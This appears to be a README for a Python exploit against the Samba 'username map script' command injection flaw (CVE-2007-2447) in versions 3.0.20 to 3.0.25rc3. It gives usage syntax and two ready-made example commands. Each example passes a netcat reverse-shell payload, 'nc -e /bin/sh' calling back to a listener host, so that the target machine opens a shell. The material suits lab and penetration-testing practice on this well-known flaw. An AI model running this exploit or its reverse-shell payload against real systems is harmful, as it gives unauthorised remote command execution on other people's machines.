Python implementation of 'Username' map script' RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).
python3 smbExploit.py <IP> <PORT> <PAYLOAD>
- IP - Ip of the remote machine.
- PORT - (Optional) Port that smb is running on.
- PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.
Examples:
python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'
CVE-2007-2447: Remote Command Injection Vulnerability
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)